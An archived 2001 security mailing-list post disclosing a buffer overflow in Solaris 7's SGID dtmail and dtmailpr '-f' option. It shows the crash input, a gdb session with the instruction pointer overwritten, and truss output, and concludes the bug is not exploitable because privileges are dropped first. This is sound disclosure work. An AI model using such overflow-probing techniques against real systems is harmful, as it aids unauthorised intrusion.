Solaris 7 /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr "-f" option buffer overflow

From: ARAI Yuu (y.araiat_private)
Date: Thu Nov 08 2001 - 22:20:31 PST

Next message: Kaneda Akira: "Re: vi buffer overflow"

Previous message: Mathias Dybvik: "Re: Infected jpeg files?"
Next in thread: Walter Park: "Re: Solaris 7 /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr "-f" option buffer overflow"
Reply: Walter Park: "Re: Solaris 7 /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr "-f" option buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi there,

I've found /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr will cause buffer
overflow on Solaris 7. /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr are
installed as SGID mail. Unfortunately, these are NOT exploitable.
Because it seems that /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr
drops privilege before the overflow occurs.


bash-2.03$ ls -la /usr/dt/bin/dtmail /usr/dt/bin/dtmailpr
-r-xr-sr-x   1 bin      mail     1490924 Oct 31 08:59 /usr/dt/bin/dtmail
-r-xr-sr-x   1 bin      mail      531732 Oct 31 08:59 /usr/dt/bin/dtmailpr
bash-2.03$ uname -a
SunOS puppet 5.7 Generic_106542-18 i86pc i386 i86pc
bash-2.03$ /usr/dt/bin/dtmail -f `perl -e 'print "A"x1200'`
Segmentation Fault
bash-2.03$ cp /usr/dt/bin/dtmail ./
bash-2.03$ ./dtmail -f `perl -e 'print "A"x1200'`
Segmentation Fault (core dumped)
bash-2.03$ gdb ./dtmail --core=core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.7"...
(no debugging symbols found)...
Core was generated by `./dtmail -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 9, Killed.
Reading symbols from /usr/dt/lib/libSDtMail.so.2...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/dt/lib/libDtSvc.so.1...
(no debugging symbols found)...done.
Reading symbols from /usr/dt/lib/libtt.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/dt/lib/libDtWidget.so.2...
(no debugging symbols found)...done.
---Type <return> to continue, or q <return> to quit---
Reading symbols from /usr/dt/lib/libXm.so.4...(no debugging symbols found)...
done.
Reading symbols from /usr/openwin/lib/libXt.so.4...
(no debugging symbols found)...done.
Reading symbols from /usr/openwin/lib/libX11.so.4...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libC.so.5...(no debugging symbols found)...done.
Reading symbols from /usr/dt/lib/libSDtFwa.so.1...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libm.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libw.so.1...
warning: Lowest section in /usr/lib/libw.so.1 is .hash at 0x74
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libthread.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libgen.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/openwin/lib/libSM.so.6...
(no debugging symbols found)...done.
Reading symbols from /usr/openwin/lib/libICE.so.6...
(no debugging symbols found)...done.
Reading symbols from /usr/openwin/lib/libXext.so.0...
---Type <return> to continue, or q <return> to quit---
(no debugging symbols found)...done.
#0  0x41414141 in ?? ()
(gdb) info r
eax            0x0      0
ecx            0x4e     78
edx            0x0      0
ebx            0x81e2688        136193672
esp            0x8045c84        0x8045c84
ebp            0x41414141       0x41414141
esi            0x8162d88        135671176
edi            0x81e1990        136190352
eip            0x41414141       0x41414141
eflags         0x10286  66182
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x10f    271
(gdb) q
bash-2.03$ su
Password:
# truss -t'!all' -u libc:getgid,setgid /usr/dt/bin/dtmail -f \
`/usr/local/bin/perl -e 'print "A"x1200'`
/1:     -> libc:getgid()
/1:     <- libc:getgid() = 1
/1:     -> libc:setgid(0x1)
/1:     <- libc:setgid() = 0
/1:     -> libc:setgid(0x6)
/1:     <- libc:setgid() = 0
/1:     -> libc:setgid(0x1)
/1:     <- libc:setgid() = 0
    Incurred fault #6, FLTBOUNDS  %pc = 0x41414141
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
        *** process killed ***

You'll see same result in dtmailpr.
It should be noted that dtmail and dtmailpr on Solaris 8 will not
cause this overflow.

Regards,
-----------------------------------------------
ARAI Yuu <y.araiat_private>
Network Security Specialist / LAC Computer Security Laboratory
http://www.lac.co.jp/security/

Next message: Kaneda Akira: "Re: vi buffer overflow"
Previous message: Mathias Dybvik: "Re: Infected jpeg files?"
Next in thread: Walter Park: "Re: Solaris 7 /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr "-f" option buffer overflow"
Reply: Walter Park: "Re: Solaris 7 /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr "-f" option buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 09 2001 - 00:33:04 PST